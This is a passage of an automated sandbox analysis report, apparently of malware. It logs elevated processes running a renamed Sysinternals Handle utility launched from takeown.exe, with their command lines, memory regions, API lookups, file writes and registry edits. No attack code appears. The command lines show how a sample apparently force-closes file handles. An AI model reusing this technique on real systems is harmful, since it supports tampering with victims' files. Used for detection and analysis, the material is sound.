| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:20 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #179: g13k6qzj64.exe
67
0
| Information | Value |
|---|---|
| ID | #179 |
| File Name | c:\users\ciihmn~1\appdata\local\temp\g13k6qzj64.exe |
| Command Line | G13k6QZj.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:06, Reason: Child Process |
| Unmonitor | End Time: 00:03:16, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x2dc |
| Parent PID | 0xcdc (c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
570
0x
68C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00026fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00153fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00171fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00180000 | 0x0023dfff | Memory Mapped File | r |
|
|
|
- |
| imm32.dll | 0x00240000 | 0x00273fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x00246fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x00250fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x00260fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x0049ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004a0000 | 0x004a0000 | 0x00627fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000630000 | 0x00630000 | 0x007b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007c0000 | 0x007c0000 | 0x01bbffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001bc0000 | 0x01bc0000 | 0x01c2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f4dc000 | 0x7f4dc000 | 0x7f4dcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| g13k6qzj64.exe | 0x140000000 | 0x140045fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x00007ff5ffed0000 | 0x7ff5ffed0000 | 0x7ff5fffcffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff5fffd0000 | 0x7ff5fffd0000 | 0x7ff5ffff2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff5ffff9000 | 0x7ff5ffff9000 | 0x7ff5ffffafff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffb000 | 0x7ff5ffffb000 | 0x7ff5ffffbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffd000 | 0x7ff5ffffd000 | 0x7ff5ffffefff | Private Memory | rw |
|
|
|
- |
| version.dll | 0x7ff8e3a50000 | 0x7ff8e3a59fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ff8e6590000 | 0x7ff8e6639fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ff8eadd0000 | 0x7ff8eae19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ff8eae30000 | 0x7ff8eae42fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ff8eb180000 | 0x7ff8eb7a7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ff8eb7b0000 | 0x7ff8eb862fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x7ff8eba50000 | 0x7ff8ebb27fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ff8ec0c0000 | 0x7ff8ec21bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ff8ec580000 | 0x7ff8edaa4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ff8edfe0000 | 0x7ff8ee030fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ff8ee150000 | 0x7ff8ee185fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ff8ee190000 | 0x7ff8ee235fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Host Behavior
File (18)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 101 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 138 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 85 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 69 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 74 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 78 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 72 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 49 |
|
1 |
Registry (7)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals | value_name = EulaAccepted, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1 |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Module (38)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ff8ee2d0000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmn~1\appdata\local\temp\g13k6qzj64.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | address_out = 0x7ff8ee2f02a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x7ff8ee2f23f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x7ff8ee2e63c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x7ff8ee2ed920 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x7ff8ee2f5620 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x7ff8ee2f5580 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x7ff8ee2f55e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7ff8ee2f0e10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7ff8ee2ef110 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7ff8ee3bcb10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7ff8ee3c5790 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7ff8ee3bea10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7ff8ee2f28c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x7ff8ee3bc470 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7ff8ee3c5410 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x7ff8ee4142f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7ff8ee3f95e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x7ff8ee413130 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7ff8ee2f0fb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x7ff8ee312720 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7ff8eb92e7a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7ff8ee3128e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x7ff8ee2e6010 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7ff8ee312a00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7ff8ee2f0310 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7ff8ee312bc0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7ff8ee2f25d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7ff8ee312cd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7ff8ee2e6000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x7ff8eb8c45e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x7ff8ee2e65a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x7ff8ee2ee960 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #180: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #180 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula "Music.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:06, Reason: Child Process |
| Unmonitor | End Time: 00:03:12, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa14 |
| Parent PID | 0xcb0 (c:\windows\syswow64\takeown.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
228
0x
D20
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x001d0000 | 0x001f9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00300000 | 0x003bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x004bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x0062ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000630000 | 0x00630000 | 0x007b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007c0000 | 0x007c0000 | 0x00940fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000950000 | 0x00950000 | 0x01d4ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d50000 | 0x01d50000 | 0x01f2ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74800000 | 0x74891fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
